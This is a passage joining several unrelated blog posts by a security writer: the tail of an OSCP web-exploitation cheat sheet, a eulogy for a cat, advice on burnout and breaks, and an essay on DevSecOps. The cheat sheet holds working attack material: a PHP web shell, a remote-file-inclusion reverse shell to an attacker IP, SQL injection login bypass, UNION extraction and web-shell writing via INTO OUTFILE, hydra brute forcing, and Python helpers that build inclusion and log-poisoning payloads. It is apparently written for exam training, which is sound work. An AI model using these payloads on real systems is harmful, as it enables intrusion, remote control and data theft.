Generate the base64 string and place it after base64, - the encoded content has to be PHP code (a bare shell command such as whoami would just be included as text), and any + or / characters in the base64 output need to be URL-encoded before they go into the query string:
echo -n '<?php system($_GET["cmd"]); ?>' | base64
Using the curl command, you can upload files to a server that accepts PUT requests:
curl -X PUT -T "$PWD/filename.ext" "http://$IP:$PORT/dir/filename.ext"
Switching to testing for RFI, create a file inclusion test by writing a local file (like a .php file) containing:
<?php
phpinfo();
?>
Note: the extension only matters on your side - the target’s PHP interpreter executes whatever it includes, so a copy saved as .txt and served from your machine still runs on the target (and saving it as .txt keeps a PHP-enabled web server on your side from executing it first).
Test for a Remote File Inclusion:
RFI.php?file=http://<tun0-ip-address>:<port>/phpinfoscript.php
First, search the phpinfo() output for the disable_functions entry - it will tell you which PHP functions (exec, system, shell_exec, passthru, popen, ...) are disabled on the remote server, so you know which one your script can use.
Add exploitation code to your script:
<?php
// exec() returns only the last line of output; swap in shell_exec() if you need all of it
echo exec($_GET['cmd']);
?>
Attempt to exploit Remote File Inclusion:
RFI.php?file=http://<tun0-ip-address>:<port>/file.php&cmd=<bash commands>
Get a Reverse Shell:
<?php
echo exec("bash -c 'bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1'");
?>
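The file inclusion steps above are easy to get subtly wrong under exam pressure (wrong traversal depth, a raw + in a base64 blob, or including the access log before poisoning it). The following Python helper is an added example - it is not code from the original post - that builds and double-checks those payloads offline. It assumes a hypothetical vulnerable parameter named file, a command parameter named cmd, and an Apache log at the path shown; the target address is a constructed RFC 5737 documentation address.

```python
import base64
from urllib.parse import quote, unquote

# Constructed PHP stub; `cmd` is the hypothetical command parameter assumed
# throughout this example (not a name taken from the original post).
PHP_STUB = "<?php system($_GET['cmd']); ?>"


def traversal(target_path, depth=8):
    """Build a directory-traversal path for an absolute file, e.g.
    ../../../../etc/passwd. Extra ../ segments are harmless once you reach /,
    so over-shooting the depth is the safe choice."""
    return "../" * depth + target_path.lstrip("/")


def data_wrapper_payload(php_code=PHP_STUB):
    """data:// wrapper carrying base64-encoded PHP (target needs allow_url_include=On).

    The base64 alphabet includes '+', '/' and '=', so the blob is URL-encoded:
    a raw '+' in a query string is decoded as a space and the include breaks.
    """
    b64 = base64.b64encode(php_code.encode()).decode()
    return "data:text/plain;base64," + quote(b64, safe="")


def decode_data_payload(payload):
    """Inverse of data_wrapper_payload: check what the target will actually include."""
    b64 = unquote(payload.split(",", 1)[1])
    return base64.b64decode(b64).decode()


def filter_wrapper_payload(php_file):
    """php://filter read: returns the target's PHP source base64-encoded instead
    of executing it (source disclosure, not code execution)."""
    return "php://filter/convert.base64-encode/resource=" + php_file


def decode_filter_response(body):
    """Decode the base64 blob that a php://filter read returns."""
    return base64.b64decode(body.strip()).decode()


def log_poison_plan(base_url, log_path="/var/log/apache2/access.log", cmd="id"):
    """Two-step log poisoning: first a request whose User-Agent is the PHP stub
    (Apache writes it into the access log), then an include of that log with
    the cmd parameter. Until step one has happened, cmd does nothing."""
    poison_request = {
        "method": "GET",
        "url": base_url,
        "headers": {"User-Agent": PHP_STUB},
    }
    trigger_url = f"{base_url}?file={traversal(log_path)}&cmd={quote(cmd)}"
    return poison_request, trigger_url


def looks_like_passwd(body):
    """Quick check that a traversal read returned a real /etc/passwd rather
    than an error page dressed up as a 200."""
    return "root:x:0:0:" in body and ":/bin/" in body


if __name__ == "__main__":
    base = "http://192.0.2.10/LFI.php"  # constructed documentation address
    print(f"{base}?file={traversal('/etc/passwd')}")
    print(f"{base}?file={data_wrapper_payload()}&cmd=id")
    print(f"{base}?file={filter_wrapper_payload('LFI.php')}")
    poison, trigger = log_poison_plan(base)
    print("1) send User-Agent:", poison["headers"]["User-Agent"])
    print("2) then request:  ", trigger)
```

Run it as a script to print the candidate URLs, or import it from a notebook and feed decode_filter_response() the body you get back from a php://filter read to recover the application's source.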
Usually my automated enumeration will start finding interesting endpoints for further exploitation, such as the common endpoints wp-admin, wp-content, and wp-includes. You can also use wpscan to enumerate things further:
Scanning for all plugins, themes, config backups, and database exports:
wpscan --url http://site-ip/domain --enumerate ap,at,cb,dbe
From here I usually turn to searchsploit to find exploits against the results uncovered with the above scan. Do your research (Google search) about the exploit and how to use it, and proceed from there.
Editing theme for Reverse Shell
First, some important links to useful documentation in the exploit process:
My absolute favorite technique for bypassing logins via the password field:
' OR '1'='1
Note that this always evaluates to true: the application’s own closing quote completes the '1'='1' comparison, so the rest of the SQL string stays syntactically valid without any further manipulation.
- The ' character terminates a SQL string literal, and whatever follows it becomes part of the query.
- End a query with the # character (a MySQL comment) to discard the remainder of the original statement.
- Look for things like password reset tokens.
You’ll need to find the exact number of columns the original query returns via ORDER BY techniques:
' ORDER BY <number> #
Note: ORDER BY will throw an error when you go beyond the number of columns, so the largest number that doesn’t error is the column count - and it is also the number of columns your UNION SELECT has to return.
Enumerating tables and columns with INFORMATION_SCHEMA (the queries below assume three columns - pad with filler values or trim to match):
' UNION SELECT TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME FROM information_schema.columns #
Selecting the schema to search:
' UNION SELECT TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME FROM information_schema.columns WHERE TABLE_SCHEMA != "<removed_schema>" #
Note: you can remove things like "mysql" (and "information_schema" / "performance_schema") to cut down the noise.
In MySQL there is a per-user privilege called File_priv (a column in mysql.user) that governs whether LOAD_FILE() and INTO OUTFILE are allowed:
' UNION SELECT File_priv,<c2>,<c3> FROM mysql.user WHERE user="<user>" #
Note: <c#> represents a filler column.
You also need to check secure_file_priv (a system variable, hence the double @@) to determine exploitability:
' UNION SELECT @@secure_file_priv,<c2>,<c3> #
Note: if the variable comes back empty, file reads and writes are unrestricted; NULL means file operations are disabled entirely; a directory path restricts them to that directory.
Try to read a file:
' UNION SELECT LOAD_FILE("/etc/passwd"),2,3 #
Try to write to a file:
' UNION SELECT 1,2,3 INTO OUTFILE "/tmp/test.txt" #
Write a shell to a file (the directory has to be writable by the MySQL user, and either served by the web server or reachable via LFI for you to use it):
' UNION SELECT "<?php system($_GET['cmd']); ?>",2,3 INTO OUTFILE "/writeable/directory/remotely.php" #
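To see those steps work end to end without a lab box, here is an added example (not from the original post) that replays them in Python against an in-memory SQLite database with constructed table and column names: the ' OR '1'='1 login bypass beside its parameterized fix, ORDER BY column counting, and UNION extraction of a table the application never queries on its own. Two substitutions are assumptions forced by SQLite: sqlite_master stands in for information_schema, and the comment terminator is -- rather than MySQL’s #, which SQLite does not support.

```python
import sqlite3

# Row marker used to pick UNION rows out of the legitimate results.
MARKER = "UNIONMARK"


def make_db():
    """Constructed demo schema: a users table the app queries, plus a
    reset_tokens table it never exposes directly."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cr3t!'), (2, 'bob', 'hunter2');
        CREATE TABLE reset_tokens(user_id INTEGER, token TEXT);
        INSERT INTO reset_tokens VALUES (1, 'tok-admin-123');
        """
    )
    return con


def vulnerable_login(con, username, password):
    """String-built query, the same mistake a vulnerable PHP login makes."""
    sql = (f"SELECT id FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return con.execute(sql).fetchone() is not None


def safe_login(con, username, password):
    """Parameterized version: the quote in the payload is just data."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None


def vulnerable_search(con, term):
    """Injection point that returns rows, so UNION-based extraction works."""
    sql = ("SELECT id, username, password FROM users "
           f"WHERE username LIKE '%{term}%'")
    return con.execute(sql).fetchall()


def count_columns(con, max_cols=20):
    """ORDER BY n probing: the first n that errors is one past the column count."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_search(con, f"' ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count not found")


def union_payload(select_cols, table, n_cols):
    """Pad a UNION SELECT with NULLs so it matches the original column count."""
    if n_cols < len(select_cols):
        raise ValueError("original query returns fewer columns than requested")
    cols = list(select_cols) + ["NULL"] * (n_cols - len(select_cols))
    return f"' UNION SELECT {','.join(cols)} FROM {table} -- "


def list_tables(con, n_cols):
    """sqlite_master plays the role of information_schema.tables here."""
    payload = union_payload([f"'{MARKER}'", "name"], "sqlite_master", n_cols)
    rows = vulnerable_search(con, payload + " ")
    # sqlite_master also lists indexes; filter to tables via a second probe.
    tables = []
    for row in rows:
        if row[0] == MARKER:
            tables.append(row[1])
    return sorted(t for t in tables if not t.startswith("sqlite_"))


def extract_tokens(con, n_cols):
    """Pull reset tokens out through the search endpoint."""
    payload = union_payload([f"'{MARKER}'", "token"], "reset_tokens", n_cols)
    rows = vulnerable_search(con, payload)
    return [row[1] for row in rows if row[0] == MARKER]


if __name__ == "__main__":
    con = make_db()
    print("bypass works:", vulnerable_login(con, "admin", "' OR '1'='1"))
    print("bypass fails (parameterized):", safe_login(con, "admin", "' OR '1'='1"))
    n = count_columns(con)
    print("columns:", n)
    print("tables:", list_tables(con, n))
    print("tokens:", extract_tokens(con, n))
```

The ORDER BY loop is the same probe you run by hand in Burp Repeater; the only difference on a real MySQL target is the # terminator and information_schema.columns in place of sqlite_master.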
Does the website have a login using default credentials?
- phpMyAdmin → root / <blank>
- Tomcat → tomcat/tomcat, admin/admin, admin/password
Can I brute force the login page with hydra?
hydra -l username -P wordlist.txt $IP http-post-form "/path/to/page.html:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed! Your user name or password was entered incorrectly."
- Target a list of usernames with the -L flag
- Target a list of passwords with the -P flag
- Target other services by using ftp://IP-addr or ssh://IP-addr
- Limit the number of threads with -t #
Is the site running Apache/Tomcat?
And with that - as always, thanks again for stopping by to read my pseudo-random musings 😊 While I draft my next blog post, you can git checkout other (usually off-topic) content I’m reading over at Instapaper - or go back and read my original “Hacking the OSCP” blog post for life lessons that the OSCP can’t teach you.
Until next time, remember to git commit && stay classy!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thanks once again to those who support this content!
We got Dalinar when he was just eight weeks old. He was named after Brandon Sanderson’s character from the Stormlight Archive shortly after my wife had started reading (and fell in love with) “The Way of Kings”. We mostly got him to be a companion to our then-six month old cat so that she wouldn’t be lonely - and after a few days of grumbling, they bonded better than we could have possibly hoped for 🥺
We also got Dalinar as a way for my wife and I to prepare ourselves for starting a family. After five years without success in that endeavor - in spite of all the benefits that science and modern medicine have to offer - losing him feels like being kicked while we’re already down. But that’s not how I want to remember him; he brought such tremendous joy and happiness to our lives ❤️
He was incredibly cuddly, playful, talkative, expressive, and curious to a fault. We had to get child safety latches for the cabinets because of him. He certainly earned the moniker “the Blackthorn” from his namesake for how furiously he played, and his meows could be heard from anywhere in the household - especially when he carried around his favorite toys in triumph.
And while we were close, he and my wife were even closer. Every night he would cuddle up with her in bed, pressing his wet nose into her cheeks and purring sweet nothings while he kneaded her for comfort. His love was always so endearing - which made it hard to be mad at him when he caused a ruckus at three in the morning because he wanted to cuddle.
Losing him is more painful than words can describe, and I know that healing is going to take a long time. His love for life - and those that were a part of his - was felt by family and friends alike. Today our home and our hearts are a little quieter, a lot emptier, and greatly saddened without him. My only hope is that, whatever spiritual existence might come next for him, it is enduring and filled with love, treats, and plenty of warm sunshine to bask in ☀️
He was our handsome boy; our Blackthorn; our High King. We love you buddy - you will be sorely missed 💔😭
Suicide is practically taboo as a topic of discussion amongst information security professionals, which is unfortunate for how common it is in our community. If you find yourself in a recurring state of being stressed, angry, sad (or depressed), fatigued, unmotivated, or otherwise experiencing a consistent malaise - it’s time to take a break.
That said, recognizing these symptoms in ourselves isn’t always easy - especially over long periods of time. Some tricks to help externalize these feelings might include something like a daily “color chart” for mood (usually captured in a grid notebook), journaling our daily experiences, or creating a system of “scoring” our day across a handful of measurements like “energy”, “happiness”, “productivity”, “motivation”, and/or “fulfillment”.
What’s important here is coming up with a system to capture measurements such that you can zoom out and recognize overarching trends. If you also have a means to capture a few quick notes as part of this system then all the better. Personally, I don’t have a specific recommendation on what application(s) or method(s) work best; the method I rely on is the HeadSpace monthly check-in. I may look into Notion templates, but for now the monthly measurement feels like enough.
One of the hardest things about taking a break is the feeling of guilt many of us experience when we allow ourselves time to slow down. For me it’s akin to a feeling of failure; that I’ve somehow disappointed myself by not continuing to grind it out. This feeling itself is also a warning sign that we may be heading down a path toward burnout; it’s important to start by acknowledging that we are deserving of the time we take to rest and recharge. The Atlantic has a whole series on the health benefits of “Doing Nothing” that is well-worth reading if you subscribe to their content.
That said, the TL;DR of that series is that the first step in taking breaks is to allow yourself time to be unproductive. If your battery is already running low, you won’t really be allowing yourself time to recharge by draining that battery further with non-work activities that you’re being productive with. Honestly, this is why I strongly encourage two-week vacations for anyone that has the privilege to take them. That first week is all about unwinding the built-up stress from work, and that second week is for recharging.
Likewise, finding creative outlets that you pour yourself into can often be a great way to recharge after you’ve gone through the process of resting and recovering. Although I should also offer a word of caution - try to avoid creative outlets too closely aligned with your day-to-day work. While these might feel fun and enjoyable in the moment, they often trigger the same stress response that led to your reason for taking a break in the first place.
And if creative outlets aren’t your thing, there are other great ways to recharge - like reading a book, catching up on a tv series (strong recommendation for Sci-Fi fans - go watch The Expanse on Amazon), watching a movie, or even playing a video game. Although my recommendation on the video game front would be to find something that doesn’t involve Player vs. Player combat, as that can create its own stressful and frustrating experiences; go for something more along the lines of “Breath of the Wild” versus “Overwatch”.
It’s easy to get trapped in a never-ending cycle of breaks. For many, there comes a point where a part of you starts to crave that sense of accomplishment and fulfillment that comes from putting in the work. You should listen to this feeling, as this is when you know it’s time to start wrapping up and preparing to get back to the grind. My advice is to transition back into productivity slowly, as leaping right back into things full-tilt will quickly undo all of that recovery you’ve just experienced.
Hopefully you will have identified activities and behaviors during your break that can help you de-stress and recover in smaller bursts once you return to a regular work schedule. The key here is striking a balance between taking longer breaks, and maintaining your health and well-being in between those breaks.
To maintain your well-being between longer breaks, my first piece of advice is to look for early warning signs and take breaks before you need them. Personally, I’m really terrible at this - I tend to let myself get to a state of being burnt out before I make it to my next break, which often creates a lot of stress leading up to my time off. Don’t be like me - keep a close eye on your mood and stress levels, and take breaks earlier than you think you’ll need them.
Likewise, if you find yourself going through repeat cycles of stress and recovery, look into seeing a therapist. And just so I’m clear - you don’t need to be depressed or experiencing relationship issues to justify seeing a therapist! In the same way you might see a fitness instructor or a career coach for those areas of your life, therapists help you solidify your emotional foundation so that you can find a sense of peace within. I was fortunate to see a therapist for several years when I was young, and it has made my life significantly better as a result of being comfortable with who I am.
And if for some reason therapy is inaccessible for you, there is also the practice of meditation. I would not say that meditation is a substitute for therapy, but the introspection that comes with practicing meditation can be a palliative experience. I have personally found zen meditation to be the most fulfilling practice, but there are a lot of meditation practices out there that can have a positive effect on your life.
As I mentioned previously, I use Headspace for my daily practice - but there are many apps available and many different forms of meditation. If you decide to take up this practice, spend some time finding the right experience for you before settling into a routine. You might even find that getting outside and away from technology can lend a spark to your creativity and energy levels. After all, there’s a reason why humans love the smell of nature after the rain.
Finally, try to find hobbies and experiences that bring you joy and fulfillment outside of the technology space. The act of creating things through various crafts and practices can bring about that sense of accomplishment and fulfillment which many lack in the day-to-day experiences on the job. Finding things that bring you small moments of happiness throughout the week are essential for recharging your energy levels and reducing stress between taking breaks.
And when all else fails, I try to remember my favorite line from Van Wilder:
Don’t take life too seriously - you’ll never get out alive.
As always, thanks again for stopping by to read my pseudo-random musings 😊 While I draft my next blog post, you can git checkout other (usually off-topic) content I’m reading over at Instapaper - or review my DevSecOps Essentials series for a detailed walkthrough of how my team delivered security at scale for Thermo Fisher Scientific.
Until next time, remember to git commit && stay classy!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thanks once again to those who already support this content!
The knowledge shared in this post is derived from my experience building the DevSecOps program at Thermo Fisher Scientific - a global Fortune 100 laboratory sciences company with over 130,000 employees and $39 Billion in annual revenue.
Full Disclosure up-front: I am employed as a Principal Security Specialist at GitHub at the time of publishing this blog post.
The unfortunate side effect of marketing buzzwords are that they often trick security practitioners into believing we can accomplish different outcomes by continuing to do the same things we’ve always done. This, my friends, is the definition of insanity - which is why it’s important we acknowledge that security teams can’t just do “DevSecOps” without first embracing “DevOps”. Security’s failure on this front is probably why so many companies continue using rebranded “sparkling AppSec” technologies that have failed developers for the last two decades.
And no - by embracing DevOps I don’t mean that security practitioners suddenly need to start writing Dockerfiles and Helm charts for artisanally crafted, home-grown, API-driven microservice security applications. What I’m referring to here are the words of Jez Humble (one of The DevOps Handbook authors), who once stated that DevOps is “just communication, coordination, and collaboration”.
If we are to succeed at securing companies and meeting the regulatory requirements we’re held to, security professionals must start by embracing DevOps through communicating, coordinating, and collaborating with our colleagues who write software.
Before security teams buy - or build - anything for our colleagues in development, we should be having regular conversations with the software engineers responsible for building the company’s most profitable technologies. Most security teams fail to deliver meaningful changes that provide impact at scale because we skip this step in the process. I mean seriously - if you want to know which security tools these teams will actually use, just ask them.
And before anyone makes a predictably snarky comment - you don’t have to give developers the option of “none” here. The right way to approach buying (or building) security technologies for our colleagues is to understand their work environment. What technologies do they interface with regularly? Do they enjoy that experience - or is there something out there they’d prefer to be using? Can we find a way to procure that technology and bundle security into it? We can only learn these things from ongoing discussions with software development teams.
I’m sure at least one person reading this is probably thinking: “but I can’t talk with all of my development teams. We have a thousand developers for every member of our security team”. And the truth is that you don’t need to scale that far; You only need to develop relationships with the 20% of development teams that represent 80% of the risk to the business. More on that later.
If you’ve ever talked with development teams, you’ll probably learn of at least one technology they absolutely hate working with. It could be anything from a workflow management system, the version control software, or a ticketing system required as part of the change review process. It might even be that security solution you’re making them use. Whatever the technology is - this is where you’ll find opportunities to make their job easier while implementing security technologies.
For development teams at Thermo Fisher Scientific, this was the version control system. Without going into too much detail here (as I’ve written an entire blog post on the subject), the development teams were tasked with maintaining their own archaic system; this required the attention of at least three developers to keep running. When the security organization offered to buy a solution that we would manage, development teams rejoiced - and their leaders seized on an opportunity to reallocate budgets (and development talent) toward other meaningful pursuits.
This was a win-win situation for the business, and because both sides agreed on pursuing the change, we were able to roll it out quickly at scale in a way that helped both organizations be more productive. We were only able to accomplish this by building meaningful relationships with the development organization - and then coordinating on efforts to maximize positive outcomes for everyone involved.
As relationships between security and development teams grow, you start finding there’s a multitude of win-win opportunities waiting to be unleashed. This especially happens when teams share things like their Objectives and Key Results (OKRs) - allowing teams to collaborate on delivery timelines that are mutually beneficial and reduce risk to the business.
In my experience, that mutual trust led to developers giving us feedback about technical debt that posed a risk to the business. They wanted to address this debt, but couldn’t because project managers were not giving them the time needed to do the work. When we helped these developers raise awareness of the issue, they agreed in return to address security-related tasks as part of paying down the technical debt. Win-win.
Simply put, there needs to be a sense of shared goals and strong partnership between development and security teams to achieve such outcomes. That is only accomplished by building relationships through communication, and then strengthening those relationships through coordination and win-win opportunities. This eventually leads to ongoing collaboration that both reduces risk to the business - while also making development teams more efficient.
In the words of former Target CIO Mike McNamara: “Build what will provide a competitive advantage, buy the rest”.
And let’s face it: unless you’re Microsoft, Apple, Google, or Amazon - you probably don’t have the finances necessary to build and scale teams that develop technologies to make your company competitive through security.
Moreover, the reason these companies can successfully build in-house technologies that allow them to compete on security is that they can scale teams to a point of resilience against attrition. They’re also attracting some of the world’s best talent to build these technologies because they can afford it. Unless your company is willing to invest a substantial amount of money to compete through security, you’re almost always better off buying a technology and scaling it.
As I mentioned earlier - you don’t need to build relationships with the entire development organization to achieve success at scale. You only need to engage with the 20% of teams that represent 80% of the risk to the business. This is known as the Pareto Principle - and it shows up all over the place.
By now I’m sure someone is probably yelling “but my auditor(s) / regulator(s) / leadership demand that I protect 100% of the business!!!” - and you will. But first, by focusing on the 20% of the business that represents 80% of the risk, you generate the necessary outcomes which allow you to address the remaining business risks.
First, by showing you can successfully work with 20% of teams that generate 80% of the risks, you gain the trust of your leadership and development colleagues. This allows you to make further inroads into the business to uncover new risks. It also proves that you can deliver on your objectives and key results.
Secondly, the security program gains momentum as you prove to leadership that you can have an impact at scale. This earns your team a reputation for getting things done - which usually leads to further investments and more opportunities to make an impact. It’s very difficult for others to slow down progress when you move quickly.
And finally - you gain instant credibility when you meet new leaders and teams. By leveraging the relationships you’ve built with 20% of the development organization, you open doors to otherwise reluctant leaders and developers: share what you’ve accomplished with these other teams. This information presents a “what’s your excuse?” challenge, and unlocks a natural inclination toward competition between business groups.
Eventually you’ll find yourself deeply embedded in the business. Through communication, coordination, and collaboration you will have built a security program that meets developers where they are - all while helping the business make progress toward reducing risk and transforming how they work in ways that are more efficient and productive. This is what it means to do “DevSecOps”.
We can’t win together if we don’t work together.
As always, thanks again for stopping by to read my pseudo-random musing 😊 While I draft my next blog post, you can git checkout other (usually off-topic) content I’m reading over at Instapaper - or review my DevSecOps Essentials series for a detailed walkthrough of how my team delivered security at scale for Thermo Fisher Scientific.
Until next time, remember to git commit && stay classy!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thanks once again to those who already support this content!